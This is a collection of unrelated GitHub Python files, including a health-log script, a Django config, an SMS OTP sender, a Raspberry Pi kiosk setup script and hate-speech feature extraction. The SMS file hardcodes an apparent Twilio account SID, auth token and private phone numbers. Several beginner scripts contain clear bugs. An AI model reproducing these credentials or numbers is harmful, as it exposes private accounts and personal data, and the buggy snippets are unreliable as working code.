add_item = input("What do you want to Add? : ")
if exer_diet == "1":
with open("harry_exer.txt","a") as f:
add = [" [",getdate(),"] ",add_item,"\n"]
for item in add:
f.write("%s" % item)
print("Item successfully added")
elif exer_diet == "2":
with open("harry_diet.txt","a") as f:
add = [" [",getdate(),"] ",add_item,"\n"]
for item in add:
f.write("%s" % item)
print("Item successfully added")
elif client == "2":
exer_diet = input("Enter number:\n1)Exercise\n2)Diet:")
add_item = input("What do you want to Add? : ")
if exer_diet == "1":
with open("rohan_exer.txt","a") as f:
add = [" [",getdate(),"] ",add_item,"\n"]
for item in add:
f.write("%s" % item)
print("Item successfully added")
elif exer_diet == "2":
with open("rohan_diet.txt","a") as f:
add = [" [",getdate(),"] ",add_item,"\n"]
for item in add:
f.write("%s" % item)
print("Item successfully added")
elif client == "3":
exer_diet = input("Enter number:\n1)Exercise\n2)Diet:")
add_item = input("What do you want to Add? : ")
if exer_diet == "1":
with open("hammad_exer.txt","a") as f:
add = [" [",getdate(),"] ",add_item,"\n"]
for item in add:
f.write("%s" % item)
print("Item successfully added")
elif exer_diet == "2":
with open("hammad_diet.txt","a") as f:
add = [" [",getdate(),"] ",add_item,"\n"]
for item in add:
f.write("%s" % item)
print("Item successfully added")
def retrive_func(client):
if client == "1":
exer_diet = input("Enter number:\n1)Exercise\n2)Diet:")
if exer_diet == "1":
try:
with open("harry_exer.txt","r") as f:
print("\nFile items\n")
for i in (f.readlines()):
print(i)
except:
print("Items does not retrieve. Please add some items in file")
elif exer_diet == "2":
try:
with open("harry_diet.txt","r") as f:
print("\nFile items\n")
for i in (f.readlines()):
print(i)
except:
print("Items does not retrieve. Please add some items in file")
elif client == "2":
exer_diet = input("Enter number:\n1)Exercise\n2)Diet:")
if exer_diet == "1":
try:
with open("rohan_exer.txt","r") as f:
print("\nFile items\n")
for i in (f.readlines()):
print(i)
except:
print("Items does not retrieve. Please add some items in file")
elif exer_diet == "2":
try:
with open("rohan_diet.txt","r") as f:
print("\nFile items\n")
for i in (f.readlines()):
print(i)
except:
print("Items does not retrieve. Please add some items in file")
elif client == "3":
exer_diet = input("Enter number:\n1)Exercise\n2)Diet:")
if exer_diet == "1":
try:
with open("hammad_exer.txt","r") as f:
print("\nFile items\n")
for i in (f.readlines()):
print(i)
except:
print("Items does not retrieve. Please add some items in file")
elif exer_diet == "2":
try:
with open("hammad_diet.txt","r") as f:
print("\nFile items\n")
for i in (f.readlines()):
print(i)
except:
print("Items does not retrieve. Please add some items in file")
print("\n")
print("\n")
print("\n")
print("***************** WELCOME TO HEALTH MANAGEMENT SYSTEM ******************")
client = input("Enter name as per the number:\n Press:\n1)Harry\n2)Rohan\n3)Hammad\n ")
add_retrieve = input("Enter number\n1)Add:\n2)Retrieve:\n")
if add_retrieve == "1":
add_func(client)
elif add_retrieve == "2":
retrive_func(client)
| [
"noreply@github.com"
] | sanketmakh.noreply@github.com |
3c9b520785fce67713ca22c75212273d02f94a2b | a61f9f5f7ef89ac77adc6d4a9363952b1487bedf | /alex28/alex28/asgi.py | 97411a6f4b507ad09a01f7c56706eef724e4d5ce | [] | no_license | Poojakulkarni18/AdvanceDjango | 6937b92e3a430086025eca4883a59c16386883c6 | 32994b1776e29469dcfbccd87e1e56ca1cbcb84a | refs/heads/main | 2023-04-16T06:38:10.920228 | 2021-04-21T10:56:21 | 2021-04-21T10:56:21 | 360,131,934 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 389 | py | """
ASGI config for alex28 project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'alex28.settings')
application = get_asgi_application()
| [
"pooja.kulkarni1811@gmail.com"
] | pooja.kulkarni1811@gmail.com |
3aa84a12c555bb02030d3ec9127a6ee3676a3089 | 3086b5195cb4dbb27aa73a24f6bf964440dff422 | /tools/fileinfo/detection/packers/pe-pack/test.py | 0d3de334959002d7c06f44c3a66d04733d5aa5ee | [
"MIT",
"Python-2.0"
] | permissive | avast/retdec-regression-tests | 8c6ea27ce2f5d0dfa6e6c845c38b56fa5bdfcc23 | 6662fed9d73cb7bc882ea69fd2429d5464950e39 | refs/heads/master | 2023-08-31T05:53:16.967008 | 2023-08-07T13:33:00 | 2023-08-15T08:33:07 | 113,974,761 | 7 | 10 | MIT | 2023-08-15T08:33:08 | 2017-12-12T10:11:00 | Python | UTF-8 | Python | false | false | 295 | py | from regression_tests import *
class Test(Test):
settings = TestSettings(
tool='fileinfo',
input='fact_rec.ex'
)
def test_correctly_analyzes_input_file(self):
assert self.fileinfo.succeeded
assert self.fileinfo.output.contains(r'.*PE-PACK \(1\.0*')
| [
"petr.zemek@avast.com"
] | petr.zemek@avast.com |
a19cd68debaab447420fbebc41cf433078095bc9 | 794075998ca79c106cdfa145c508a2564414f9e7 | /flask-nlp-api/nlp/clean_html.py | cada7c0718cbcf1207062dbee65e7c6e3351c886 | [
"MIT"
] | permissive | dr-jgsmith/flask-nlp-api | 814ab8cfb95ab20fd378642a17e5e3e4bdeb8851 | bc47594a0b200271ff71d1637ae76338d3b3912c | refs/heads/master | 2020-06-01T07:15:29.648678 | 2019-06-07T06:44:25 | 2019-06-07T06:44:25 | 190,694,684 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,012 | py | import re
def clean_html(html):
"""
Remove HTML markup from the given string.
:param html: the HTML string to be cleaned
:type html: str
:rtype: str
"""
str_html = str(html)
# First we remove inline JavaScript/CSS:
cleaned = re.sub(r"(?is)<(script|style).*?>.*?(</\1>)", "", str_html.strip())
# Then we remove html comments. This has to be done before removing regular
# tags since comments can contain '>' characters.
cleaned = re.sub(r"(?s)<!--(.*?)-->[\n]?", "", cleaned)
# Next we can remove the remaining tags:
cleaned = re.sub(r"(?s)<.*?>", " ", cleaned)
# Finally, we deal with whitespace
cleaned = re.sub(r" ", " ", cleaned)
cleaned = re.sub(r"[\s]", " ", cleaned)
cleaned = re.sub(r" ", " ", cleaned)
cleaned = re.sub(r" ", "\n", cleaned)
clean = cleaned.split()
for i in clean:
if len(i) <= 1:
clean.remove(i)
else:
pass
clean = ' '.join(clean)
return clean
| [
"justin.smith@directharvest.io"
] | justin.smith@directharvest.io |
7a3b0b6c87c357aadf257f4f44f512d2f2a6cd10 | 46c33a3f955f5130aea0c8bea19c1439665b7d3a | /code/filt_key_kmer.py | 5b3ddb66fbd15eec434c2939676373520e59167f | [
"Apache-2.0"
] | permissive | ZjGaothu/KmerTR | c078a1af2c2acd7276cff74ee8c2722210c5f96c | cfaa7169c0f40401d8cdcbf9c8107ad3bb3d103e | refs/heads/main | 2023-05-25T19:52:41.515682 | 2021-06-06T13:18:34 | 2021-06-06T13:18:34 | 364,833,029 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,471 | py | import numpy as np
import pandas as pd
import argparse
def seq2kmer(K,sequence):
seq = sequence
encoding_matrix = {'a':'A', 'A':'A', 'c':'C', 'C':'C', 'g':'G', 'G':'G', 't':'T', 'T':'T', 'n':'N', 'N':'N'}
kmer_mat = []
for i in range(len(seq)-K+1):
sub_seq = seq[i:(i+K)]
sub_seq = list(sub_seq)
for j in range(K):
sub_seq[j] = encoding_matrix[sub_seq[j]]
kmer_mat.append(''.join(sub_seq) )
return kmer_mat
def get_args():
parser = argparse.ArgumentParser(description='Motif analysis')
parser.add_argument('--attention_weight_path', type=str, default='./data/seq/',
help='positive data set path')
parser.add_argument('--fasta_path', type=str, default='./data/tf/',
help='negtive tf motif score set path')
parser.add_argument('--save', type=str, default='./data/result/',
help='path to save the final feature')
parser.add_argument('--CREtype', type=str, default='silencers',
help='cis-regulatory element type')
parser.add_argument('--celltype', type=str, default='K562',
help='cell line')
parser.add_argument('--rank', type=int, default=2,
help='num of key kmer of each line of each CRE')
parser.add_argument('--num', type=int, default=3,
help='num of key kmer of each cell type & CRE type')
args = parser.parse_args()
return args
args = get_args()
CRE = args.CREtype
cell = args.celltype
save_path = args.save
attn_w_path = args.attention_weight_path
fasta_path = args.fasta_path
rank = args.rank
nums = args.num
# 保存所有attention 找到的kmer
cells_ = []
kmers_ = []
CREs_ = []
attention_pair = []
attention_weight = np.load(attn_w_path,allow_pickle=True).item()
data = list(attention_weight.values())
f = open(fasta_path)
ls=[]
for line in f:
ls.append(line.replace('\n',''))
f.close()
kmer_mat = []
for i in range(1,len(ls) + 1):
if i % 2 == 0:
continue
else:
kmer_mat.append(ls[i])
# generate kmer attention list
network = []
for i in range(len(data)):
temp_matrix = data[i]
kmer_cell = seq2kmer(5,kmer_mat[i])
for j in range(temp_matrix.shape[0]):
values = np.sort(temp_matrix[j])[-rank:]
source_kmer = kmer_cell[j]
for value in values:
max_index = np.where(temp_matrix[j]==value)
for k in range(len(max_index[0])):
target_kmer = kmer_cell[int(max_index[0][k])]
cell = []
cell.append(source_kmer)
cell.append(target_kmer)
cell.append(temp_matrix[j][max_index[0][k]])
network.append(cell)
network = np.array(network)
# generate kmer attention unique network
temp_network = network
all_kmer_dict = {}
map_idx2kmer = []
count = 0
for i in temp_network:
i_source = i[0]
i_target = i[1]
if i_source not in all_kmer_dict:
all_kmer_dict[i_source] = count
map_idx2kmer.append(i_source)
count += 1
if i_target not in all_kmer_dict:
all_kmer_dict[i_target] = count
map_idx2kmer.append(i_target)
count += 1
# generate adjacent matrix
subnetwork = np.zeros((len(all_kmer_dict),len(all_kmer_dict)))
adjacent = np.zeros((len(all_kmer_dict),len(all_kmer_dict)))
count = 0
for link in temp_network:
count += 1
subnetwork[int(all_kmer_dict[link[0]]),int(all_kmer_dict[link[1]])] += float(link[2])
adjacent[int(all_kmer_dict[link[0]]),int(all_kmer_dict[link[1]])] += 1
values = np.sort(adjacent.reshape(-1,))[-nums:]
# Get the most critical top Nums group results
for value in values:
max_index = np.where(adjacent==value)
for j in range(len(max_index[0])):
cell_one = []
source_kmer = map_idx2kmer[int(max_index[0][j])]
target_kmer = map_idx2kmer[int(max_index[1][j])]
cell_one.append(source_kmer)
cell_one.append(target_kmer)
cell_one.append(adjacent[max_index[0][j],max_index[1][j]])
cell_one.append(subnetwork[max_index[0][j],max_index[1][j]])
cell_one.append(cell)
cell_one.append(CRE)
attention_pair.append(cell_one)
# save result
attention_pair = np.array(attention_pair)
max_attn = pd.DataFrame(attention_pair,columns = ['source','target','attention hits','attention weight','cell line','CRE'])
max_attn.to_csv(save_path + 'key_kmer.csv')
| [
"noreply@github.com"
] | ZjGaothu.noreply@github.com |
0022ed38288d5e7eca8753a6954b82996e2bc701 | 29a82a7622ed99208ea84a6421c60f17a2b6e0ee | /ryd assignment.py | 7e6a21479beb31e0ff2930b916f4046a1393c239 | [] | no_license | bioinfonerd-forks/extract-text-from-pdf-using-python | a87b3f321580426674af6ca4fc2461ed43138867 | 5cc49df12c185184ddf77de59d06e1af2c70c662 | refs/heads/master | 2022-11-06T19:22:36.158719 | 2020-07-04T16:33:46 | 2020-07-04T16:33:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 557 | py | #-*- coding: utf-8 -*-
import PyPDF2 as pdf
file=open('The_Living_World.pdf','rb')
file
pdf_reader=pdf.PdfFileReader(file)
pdf_reader
help(pdf_reader)
pdf_reader.getIsEncrypted()
pdf_reader.getNumPages()
i=0
while i<pdf_reader.getNumPages():
pageinfo=pdf_reader.getPage(i)
text=pageinfo.extractText()
print(text)
i=i+1
fd=open('The_Living_World.pdf','r','utf-8')
d=fd.read()
fd.close()
new_file=open('The_Living_World.pdf','w')
for i in range(len(file)):
new_file.write(fd)
new_file.close()
| [
"noreply@github.com"
] | bioinfonerd-forks.noreply@github.com |
1822516576499b6b4080fe2d76be4ae5758b4db8 | c9c26f132573da48c5122ffeb8da44d24b10ae01 | /snr/core/task_queue.py | 876f268e080d4895bc71308af907084a7267a97f | [
"MIT"
] | permissive | sfshaw/SNR | 549bdd887e4e1f4b70a37cb07f4a159fdadfab52 | 593b7b78a91e23e0fcb03985b72f29a66101579c | refs/heads/main | 2023-07-24T12:59:34.331611 | 2021-09-07T03:50:21 | 2021-09-07T03:50:21 | 301,933,814 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,813 | py | import logging
import queue as que
from typing import Optional
from snr.prelude import *
from .contexts import Context
class TaskQueue(Context, AbstractTaskQueue):
queue: que.Queue[Task]
def __init__(self,
parent: AbstractContext,
task_source: TaskSource,
) -> None:
super().__init__("task_queue",
parent.profiler,
parent.timer)
self.task_source = task_source
self.queue = que.Queue()
self.log.setLevel(logging.WARNING)
def schedule(self, t: SomeTasks) -> None:
""" Adds a Task or a list of Tasks to the node's queue
"""
if isinstance(t, Task):
self.schedule_task(t)
elif t:
# Recursively handle lists
self.dbg("Recursively scheduling list of %s tasks",
len(t))
for item in t:
if item:
self.schedule(item)
else:
self.err("Cannot schedule %s", t)
def schedule_task(self, t: Task) -> None:
# Handle normal tasks
self.dbg("Scheduling task %s", t)
# Ignore Priority
self.queue.put(t)
def get_next(self) -> Optional[Task]:
"""Take the next task off the queue
"""
if self.queue.empty():
new_tasks = self.get_new_tasks()
if new_tasks:
self.schedule(new_tasks)
else:
return None
next = self.queue.get()
self.dbg("Next task: %s", next)
self.dbg("%s tasks left in queue", self.queue.qsize())
return next
def get_new_tasks(self) -> SomeTasks:
return self.task_source()
def is_empty(self) -> bool:
return self.queue.empty()
| [
"sfshaw@calpoly.edu"
] | sfshaw@calpoly.edu |
6bfdd123693cf5516a29996bfd135ee882ad1c7e | 60655d0db682b16d01913363e7c9239b30afc705 | /processors/errors/error_main_loop.py | 96a886432c5face5a40bcb362e5fac65362270b6 | [
"Apache-2.0"
] | permissive | ARLlab/Summit | b7fab84525d3257b746eb158be7ee43039823e80 | 1aa0d85cedebe85fab969df004409cc8f28595b3 | refs/heads/master | 2022-12-10T02:29:01.427830 | 2020-04-19T01:07:11 | 2020-04-19T01:07:11 | 171,544,780 | 0 | 4 | Apache-2.0 | 2022-12-03T01:07:56 | 2019-02-19T20:30:12 | Python | UTF-8 | Python | false | false | 5,372 | py | from datetime import datetime
import datetime as dt
import asyncio
from summit_errors import Error, NewDataEmail, sender, send_processor_email
PROC = 'Error Processor'
def new_data_found(processor, last_data_time, logger):
"""
Resolution function to be passed into Error objects.
:param processor: str, in ['voc', 'methane', 'picarro']
:param last_data_time: datetime, last datetime value for the given processor when the Error was initiated
:param logger: logging logger
:return: boolean, is there newer data in the database?
"""
if get_last_processor_date(processor, logger) > last_data_time:
return True
else:
return False
def get_last_processor_date(processor, logger):
"""
Retrieves the latest high-level date for the specified processor. It looks at GcRuns for VOCs (complete runs),
5-second Datums for the Picarro, and matched GcRuns for methane.
:param processor: str, in ['voc', 'picarro', 'methane']
:param logger: logging logger
:return: datetime, date of last data point for the specified processor
"""
from summit_core import connect_to_db, TempDir
if processor is 'voc':
from summit_core import voc_dir as directory
from summit_voc import GcRun as DataType
elif processor is 'picarro':
from summit_core import picarro_dir as directory
from summit_picarro import Datum as DataType
elif processor is 'methane':
from summit_core import methane_dir as directory
from summit_methane import GcRun as DataType
else:
logger.error('Invalid processor supplied to get_last_processor_date()')
assert False, 'Invalid processor supplied to get_last_processor_date()'
with TempDir(directory):
engine, session = connect_to_db(f'sqlite:///summit_{processor}.sqlite', directory)
val = session.query(DataType.date).order_by(DataType.date.desc()).first()
if val:
val = val[0]
session.close()
engine.dispose()
return val
def matching_error(error_list, reason, processor):
"""
There's a matching error if any error in the list has the same processor and reason associated with it.
:param error_list: list, of Error objects
:param reason: str, reason for the error
:param processor: str, in ['voc', 'methane', 'picarro']
:return: boolean, True if there's a matching error
"""
return next((True for err in error_list if
(err.email_template.processor == processor and err.reason == reason)), False)
async def check_for_new_data(logger, active_errors=None):
reason = 'no new data'
if not active_errors:
active_errors = []
try:
logger.info('Running check_for_new_data()')
for proc, time_limit in zip(['voc', 'methane', 'picarro'], [dt.timedelta(hours=hr) for hr in [8, 3, 2]]):
last_data_time = get_last_processor_date(proc, logger)
if not last_data_time:
logger.warning(f'No data available to compare for {proc}.')
continue
if datetime.now() - last_data_time > time_limit:
if matching_error(active_errors, reason, proc):
logger.error(f'Error for {reason} for the {proc} processor is already active and was ignored.')
continue
else:
active_errors.append(Error(reason, new_data_found, NewDataEmail(sender, proc, last_data_time)))
return active_errors
except Exception as e:
logger.error(f'Exception {e.args} occurred in check_for_new_data()')
send_processor_email(PROC, exception=e)
return False
async def check_existing_errors(logger, active_errors=None):
logger.info('Running check_existing_errors()')
try:
if not active_errors:
logger.info('Check_existing_errors() called without any active errors.')
return False
for ind, err in enumerate(active_errors):
if err.reason == 'no new data':
if err.is_resolved(processor=err.email_template.processor,
last_data_time=err.email_template.last_data_time, logger=logger):
active_errors[ind] = None
else:
logger.info('Error aside from "no new data" was found.')
pass # is_resolved() handles logging in both cases
active_errors = [err for err in active_errors if err]
return active_errors
except Exception as e:
logger.error(f'Exception {e.args} occurred in check_existing_errors()')
send_processor_email(PROC, exception=e)
return active_errors
async def main():
try:
from summit_core import configure_logger
from summit_core import error_dir as rundir
logger = configure_logger(rundir, __name__)
except Exception as e:
print('Error logger could not be configured')
send_processor_email(PROC, exception=e)
return False
errors = []
while True:
errors = await asyncio.create_task(check_for_new_data(logger, active_errors=errors))
await asyncio.create_task(check_existing_errors(logger, active_errors=errors))
if __name__ == '__main__':
loop = asyncio.get_event_loop()
loop.run_until_complete(main())
| [
"brendano257@gmail.com"
] | brendano257@gmail.com |
71455ed344306de3849479f4255343f938f388b0 | d769be9ec6a69429bd158890190cfbdfb5657402 | /sbdhmi.py | 8e2472d98a87c2c134a0d3114f3e82c1efb5b321 | [] | no_license | jwreplogle/sbd | 85bec400f17e81f9897dc2efc0237eaf02c278bd | 51165f96e88b5e4d8d6c88ecf14fd7f0939674bc | refs/heads/master | 2020-04-21T13:33:13.083722 | 2019-02-11T15:28:46 | 2019-02-11T15:28:46 | 169,602,831 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,821 | py | import subprocess
import os
import sys
def uupdt():
#Installs updates and software
os.system('clear')
subprocess.call("sudo apt-get install x11-xserver-utils libnss3 unclutter", shell=True)
subprocess.call("sudo apt-get update", shell=True)
subprocess.call("sudo apt-get dist-upgrade -y", shell=True)
os.system('clear')
print('\x1b[6;30;42m' + 'Updates & Software Installed!' + '\x1b[0m')
def uusr():
#Creates a user and add them to sudo and adm
uname = raw_input("Type Username: ")
subprocess.call(["useradd", uname])
subprocess.call(["passwd", uname])
subprocess.call(["usermod", "-aG","sudo", uname])
subprocess.call(["usermod", "-aG","adm", uname])
print('\x1b[6;30;42m' + 'Sudo user creation is a Success!' + '\x1b[0m')
def startmod():
#modifies the autostart file
os.system('sudo cp /etc/xdg/lxsession/LXDE-pi/autostart /etc/xdg/lxsession/LXDE-pi/autostartorg')
os.system('sudo rm /etc/xdg/lxsession/LXDE-pi/autostart')
f = open('/etc/xdg/lxsession/LXDE-pi/autostart','w+')
f.write('\n' + '@lxpanel --profile LXDE-pi')
f.write('\n' + '@pcmanfm --desktop --profile LXDE-pi')
f.write('\n' + '@point-rpi')
f.write('\n' + '@xset s noblank')
f.write('\n' + '@xset s off')
f.write('\n' + '@xset -dpms')
f.write('\n' + '@unclutter -idle 0.1 -root')
uurl = raw_input("Enter URL=")
bob = '@chromium-browser --incognito --kiosk ' + uurl
f.write('\n' + bob)
f.close()
def limod():
#modifies the lightdm.conf file
f = open('/etc/lightdm/lightdm.conf','a')
f.write('\n' + 'xserver-command= X -s 0 -dpms')
f.close()
print('\x1b[6;30;42m' + 'File modification was a Success!' + '\x1b[0m')
def umod():
#remove login pi from sudo and adm
os.system('sudo deluser pi sudo')
os.system('sudo deluser pi adm')
print('\x1b[6;30;42m' + 'User Pi demotion was a Success!' + '\x1b[0m')
def uprint():
#the ending is near
print('\x1b[6;30;42m' + 'You may now reboot your system to go into KIOSK' + '\x1b[0m')
#start of programming
print('\033[94m' + "This script will:" + '\x1b[0m')
print('\033[94m' + "1: Update the system" + '\x1b[0m')
print('\033[94m' + "2: Install necessary software" + '\x1b[0m')
print('\033[94m' + "3: Ask you to create Admin user" + '\x1b[0m')
print('\033[94m' + "4: Modify autostart & lightdm files" + '\x1b[0m')
print('\033[94m' + "5: Demote user Pi" + '\x1b[0m')
print('\033[94m' + "Press CTRL C to Stop this process" + '\x1b[0m')
print('\033[94m' + "Or" + '\x1b[0m')
syop = int(input('\033[94m' + "Process Script? 1 -Continue 2 -Exit Script:" + '\x1b[0m'))
if syop == 1:
uupdt()
uusr()
startmod()
limod()
umod()
uprint()
else:
sys.exit()
| [
"noreply@github.com"
] | jwreplogle.noreply@github.com |
608ce75c1b12446acf0c7964552cd6c63b9473e8 | e9a08404751aee4891ed01fc7ef42c05761e853a | /py_send_sms.py | e55e59af7551b4a42d2c1ce9b7ea2db88e580a6a | [] | no_license | kathirm/TNPLTRPA | 8eed651ff46a02bcfe5de48153ec198751ee6c20 | db170bd8ad686543188c6aac82d2e9c12c72b0e7 | refs/heads/master | 2022-12-17T10:26:27.049538 | 2020-07-24T09:35:43 | 2020-07-24T09:35:43 | 171,221,067 | 0 | 0 | null | 2022-12-08T06:21:54 | 2019-02-18T05:35:17 | Python | UTF-8 | Python | false | false | 1,257 | py | from twilio.rest import Client
import string, time
import random
def otp():
try:
chars = string.digits;
password = ''
for i in range(4):
password += random.choice(chars)
except Exception as eR:
print "OTP Generation exception eror: %s"%eR
return password
def sms_integ():
try:
account_sid = 'ACeb5fcef2905d61dd58713018059ba3b3'
auth_token = 'a0adb50e5537cd8bba07907891c37ace'
#T = "+919566540187"
#B = "+919600099520"
J = "+918870653018"
#R = "+919884055194" UR
#CR = "+919791020409" UR
#K = "+918940776800"
#Y = "+919791305251"
client = Client(account_sid, auth_token)
#print "client_connection_status", client
password = otp()
message = client.messages.create(
body ='Hi...! Welcome to Terafast Networks RPA Portal-Access Login OTP : '+password+' Thank you :)',
from_ = '+12564729952',
to = J
)
print(message.sid)
print "OTP send Successfully for Registed PhoneNumber"
#time.sleep(20)
print "OTP Session Expired"
except Exception as er:
print er
sms_integ()
| [
"mkathir@terafastnet.com"
] | mkathir@terafastnet.com |
db499f2486f725b4c37aca12284a9f0c46c5c8e5 | 28cd5213b0b2815877de0d80882ba33ae12faaa1 | /Hate Speech/FeatureFunctions.py | d29c88c9d017a23d30d553b40c5fb7a26eada264 | [
"MIT"
] | permissive | davidpomerenke/HS-Detection-Project | 954b1c157fc7b5e2ed7c89618476058919b15618 | 480174581077a48ceee2609385ffd2a6fa0b55da | refs/heads/main | 2023-04-01T20:29:26.555046 | 2021-03-24T01:27:16 | 2021-03-24T01:27:16 | 350,909,183 | 0 | 0 | null | 2021-03-24T01:28:38 | 2021-03-24T01:28:37 | null | UTF-8 | Python | false | false | 10,871 | py | #!/usr/bin/env python
# coding: utf-8
# In[ ]:
# In[1]:
import pandas as pd
import numpy as np
import pickle
import sys
from sklearn.feature_extraction.text import TfidfVectorizer
import nltk
from nltk.stem.porter import *
import string
import re
from vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer as VS
from textstat.textstat import *
from sklearn.linear_model import LogisticRegression
from sklearn.feature_selection import SelectFromModel
from sklearn.metrics import classification_report
from sklearn.svm import LinearSVC
import matplotlib.pyplot as plt
import seaborn
#new
from nltk.tokenize.casual import casual_tokenize #casual_tokenize(text, preserve_case=True, reduce_len=False, strip_handles=False)
from nltk.tokenize import TreebankWordTokenizer
get_ipython().run_line_magic('matplotlib', 'inline')
# In[2]:
# Shared Porter stemmer instance, reused by tokenize() and tokenize_words().
stemmer = PorterStemmer()
def preprocess(text_string):
    """
    Normalise a raw tweet for text-only analysis.

    Collapses runs of whitespace into a single space, then deletes URLs
    and @-mentions entirely, so downstream counts are not skewed by the
    specific links or usernames a tweet happens to contain.
    """
    whitespace_re = '\s+'
    url_re = ('http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|'
              '[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+')
    mention_re = '@[\w\-]+'
    cleaned = re.sub(whitespace_re, ' ', text_string)
    cleaned = re.sub(url_re, '', cleaned)
    return re.sub(mention_re, '', cleaned)
def tokenize(tweet):
    """Removes punctuation & excess whitespace, sets to lowercase,
    and stems tweets. Returns a list of stemmed tokens.

    Note: the separator pattern must use ``+`` (one or more non-letters).
    The original ``[^a-zA-Z]*`` also matches the empty string, and on
    Python 3.7+ re.split() splits at zero-width matches too, which broke
    every tweet into single characters instead of words.
    """
    tweet = " ".join(re.split("[^a-zA-Z]+", tweet.lower())).strip()
    tokens = [stemmer.stem(t) for t in tweet.split()]
    return tokens
def basic_tokenize(tweet):
    """Same as tokenize but without the stemming.

    Note: the separator pattern must use ``+`` (one or more). The
    original ``[^a-zA-Z.,!?]*`` also matches the empty string, and on
    Python 3.7+ re.split() splits at zero-width matches too, yielding
    single letters instead of words.
    """
    tweet = " ".join(re.split("[^a-zA-Z.,!?]+", tweet.lower())).strip()
    return tweet.split()
# Own function
def tokenize_words(tweet, use_stemmer = True):
    """Lowercase *tweet*, split it on whitespace and common punctuation
    (hyphen, period, comma, semicolon, exclamation mark, closing
    parenthesis) and return the word list, Porter-stemmed unless
    *use_stemmer* is False."""
    normalised = " ".join(re.split(r"[-\s.,;!)]+", tweet.lower())).strip()
    pieces = normalised.split()
    if not use_stemmer:
        return pieces
    return [stemmer.stem(piece) for piece in pieces]
def pos_tag_tweet(tweet, tokenizer, print_tweet = False):
    """Tokenize *tweet* with the supplied *tokenizer* callable, run NLTK
    part-of-speech tagging over the tokens, and return only the tags,
    joined into a single space-separated string (the words themselves
    are discarded).  *print_tweet* is accepted for interface
    compatibility but unused."""
    tagged_pairs = nltk.pos_tag(tokenizer(tweet))
    return " ".join(tag for _word, tag in tagged_pairs)
# In[3]:
#Now get other features
# Shared VADER sentiment analyzer instance, reused by other_features().
sentiment_analyzer = VS()
def count_twitter_objs(text_string):
    """
    Count URLs, @-mentions and #hashtags in *text_string*.

    Each entity is first rewritten to a fixed placeholder token
    (URLHERE / MENTIONHERE / HASHTAGHERE) and the placeholders are then
    counted, so the counts are standardized and do not depend on the
    specific links, users or tags mentioned.

    Returns a (url_count, mention_count, hashtag_count) tuple.
    """
    substitutions = (
        ('\s+', ' '),
        (('http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|'
          '[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+'), 'URLHERE'),
        ('@[\w\-]+', 'MENTIONHERE'),
        ('#[\w\-]+', 'HASHTAGHERE'),
    )
    parsed = text_string
    for pattern, token in substitutions:
        parsed = re.sub(pattern, token, parsed)
    return (parsed.count('URLHERE'),
            parsed.count('MENTIONHERE'),
            parsed.count('HASHTAGHERE'))
def other_features(tweet):
    """This function takes a string and returns a list of features.
    These include Sentiment scores, Text and Readability scores,
    as well as Twitter specific features"""
    # VADER polarity dict with keys 'neg', 'neu', 'pos', 'compound'.
    sentiment = sentiment_analyzer.polarity_scores(tweet)

    words = preprocess(tweet) #Get text only

    syllables = textstat.syllable_count(words)
    # NOTE(review): `words` is a string, so this iterates characters
    # (each len 1) and equals len(words) — character count incl. spaces.
    num_chars = sum(len(w) for w in words)
    num_chars_total = len(tweet)
    num_terms = len(tweet.split())
    num_words = len(words.split())
    # +0.001 guards against division by zero on empty input.
    avg_syl = round(float((syllables+0.001))/float(num_words+0.001),4)
    num_unique_terms = len(set(words.split()))

    ###Modified FK grade, where avg words per sentence is just num words/1
    FKRA = round(float(0.39 * float(num_words)/1.0) + float(11.8 * avg_syl) - 15.59,1)
    ##Modified FRE score, where sentence fixed to 1
    FRE = round(206.835 - 1.015*(float(num_words)/1.0) - (84.6*float(avg_syl)),2)

    # (url_count, mention_count, hashtag_count) from count_twitter_objs().
    twitter_objs = count_twitter_objs(tweet)
    retweet = 0
    # NOTE(review): substring containment, not token match — this also
    # fires on words containing "rt" (e.g. "shirt"); confirm intended.
    if "rt" in words:
        retweet = 1
    # Feature order: FKRA, FRE, syllables, avg_syl, chars, total chars,
    # terms, words, unique terms, 4 sentiment scores, hashtags,
    # mentions, urls, retweet flag.
    features = [FKRA, FRE,syllables, avg_syl, num_chars, num_chars_total, num_terms, num_words,
                num_unique_terms, sentiment['neg'], sentiment['pos'], sentiment['neu'], sentiment['compound'],
                twitter_objs[2], twitter_objs[1],
                twitter_objs[0], retweet]
    #features = pandas.DataFrame(features)
    return features
def get_feature_array(tweets):
    """Compute the other_features() vector for every tweet and stack the
    results into a 2-D numpy array (one row per tweet)."""
    return np.array([other_features(tweet) for tweet in tweets])
# In[4]:
def print_cm(y, y_preds, save_cm = False, save_path = None):
    """Plot (and optionally save) a row-normalised confusion matrix.

    Parameters
    ----------
    y : true class labels, encoded 0/1/2 = Hate/Offensive/Neither
    y_preds : predicted class labels, same encoding
    save_cm : when True, also write the figure to disk
    save_path : target file; defaults to 'data/confusion.png' when omitted

    Each row is divided by its own total, so cell (i, j) is the fraction
    of true-class-i samples predicted as class j.
    """
    # Matplotlib/LaTeX setup for publication-quality PDF/PS output.
    plt.rc('pdf', fonttype=42)
    plt.rcParams['ps.useafm'] = True
    plt.rcParams['pdf.use14corefonts'] = True
    plt.rcParams['text.usetex'] = True  # requires a working LaTeX install
    plt.rcParams['font.serif'] = 'Times'
    plt.rcParams['font.family'] = 'serif'
    from sklearn.metrics import confusion_matrix
    # Bind the result to a new name instead of rebinding (shadowing) the
    # just-imported confusion_matrix function, as the original did.
    cm = confusion_matrix(y, y_preds)
    matrix_proportions = np.zeros((3, 3))
    for i in range(0, 3):
        # Normalise each row by its total; assumes every class occurs at
        # least once in y (a missing class would divide by zero).
